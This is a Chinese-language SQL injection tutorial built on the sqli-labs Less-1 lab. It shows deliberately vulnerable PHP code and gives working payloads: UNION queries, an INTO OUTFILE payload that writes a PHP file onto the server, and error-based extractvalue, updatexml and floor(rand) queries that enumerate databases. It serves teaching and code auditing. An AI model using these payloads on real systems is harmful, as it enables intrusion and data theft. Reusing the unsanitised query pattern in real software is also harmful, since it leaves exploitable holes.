V站笔记
有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引擎搜索即可,小东不再赘述。
简单来说,每天熬夜敲代码的程序员,写程序的时候,没有考虑到程序在与数据库交互时会产生一些安全问题,倘若没有对用户输入的数据正确判断、过滤,就会导致用户可以构造恶意的payload来获取更多的数据( 执行用户的任意操作
),甚至是Download数据库,导致信息泄漏,甚至导致受害人受到人身攻击或威胁。
常见的SQL注入是基于sql语言来的,有 SELECT
UPDATE
INSERT
这三种SQL语句,注入原理都是类似的,了解一下SQL语法即可,下面以SELECT查询语句为例子。
1. SELECT 类型
源码:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; //获取id值
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; //SQL查询语句
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) //如果有数据,查询到了结果(根据sql语句输出条件还可以盲注,以后再讲)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else //否则输出错误消息
{
echo '<font color= "#FFFF00">';
print_r(mysql_error()); //此处输出了mysql的错误消息,正常的线上产品,这种调试输出的语句都得注释或删除
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";} //如果用户没有传递id值则在页面输出这一句话,如第一幅图所示
?>
2.检测SQL注入
通过上面的源码分析,如果我们的SQL语句有错误,那么将会输出错误信息,也就说明了SQL语句没有正确执行,用户提交的而数据导致了程序原本的SQL语句失效。
检测方法常见在参数后面加上'
and 1=1
and 1=2
xor 1=1
等等来判断是否存在SQL注入(是否过滤),如下所示
3.构造Payload
http://www.test.com/Less-1/index.php?id=-1%27%20union%20select%20user(),database(),version()%20%23
妥妥的SQL注入,一般情况下,注入是不会有数据回显的,这时候我们就可以通过SQL盲注的方式,或者简单粗暴的SQL查询写文件的方式,盲注挺麻烦的,一个个手工猜解当然是不可能的,当我们构造好了payload只需要用Python写个脚本,跑一下就行了,SQL盲注放到下篇文章再讲,写文件的方式需要:
如下可写入文件:
http://www.test.com/Less-1/index.php?id=-1%27%20union%20select '<?php phpinfo(); ?>' into outfile 'D:\\Server\\sqli\\Less-1\\1.php' %23
访问,即可在当前Less-1目录下生成一个1.php文件,会显示输出phpinfo
信息
访问:http://www.test.com/Less-1/1.php
总的来说,SQL注入漏洞很常见,在代码审计的时候是一个需要格外重视的漏洞,即使程序有做过滤,多思考,结合程序其他的漏洞,配合起来就可以绕过过滤,文章有不妥之处,还望批评指正,联系QQ:1099718640
!
蓝奏网盘:https://www.lanzous.com/i18ww4h 百度网盘:https://pan.baidu.com/s/1_yNCrK4uMm7rCNzWIdVthw
Mysql中的注释符
#
--
/*...*/
/*!...*/ 内联注释 /*!50select*/(mysql版本大于50执行)
常见函数
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统 Windows Server 2003
字符串拼接函数:
concat(str1,str2)
concat_ws(separator, str1,str2...)
group_concat(str1,str2......)
布尔注入、延时注入用到的一些 函数
1, exists()
2, ascii()
3, substr()
exists()函数:
esists 用于检查子查询是否会返回一行数据,该子查询实际上并不返回任
何数据,而是返回True或False。
ascii()函数:
返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果
str是NULL,返回NULL。
substr( ) 函数:
substr(string, num start, num length) start #从第1位开始,。
string 为字符串;
start为起始位置;
length为长度。
substr(database(),1,1); xss
x
limit 0,1
0 查询的位置,0表示第一行,
1 查询的条数
报错注入用到的一些函数
floor()
floor(x),有时候也写做Floor(x),其功能是“向下取整”,或者说“向下
舍入”,即取不大于x的最大整数
1.select * from admins where id=1 and (select 1 from (select count(*)
,concat(user(),floor(rand(0)*2))x from information_schema.tables gr
oup by x)a);
2.获取有多少个数据库 and (select 1 from(select count(*),concat((select
(select (select concat(0x7e,count(schema_name),0x7e) from
information_schema.schemata)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a)
通过limit 获取所有数据库名
and (select 1 from(select count(*),concat((select
(select (select concat(0x7e, schema_name, 0x7e)
from information_schema.schemata limit 0,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
常见报错函数:
ExtractValue函数:
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的
名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
and extractvalue(1, payload)
UpdateXML函数:
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的
名称,文中为Doc 1
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解
Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的
数据
作用:改变文档中符合条件的节点的值
+and updatexml(1,payload,1)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。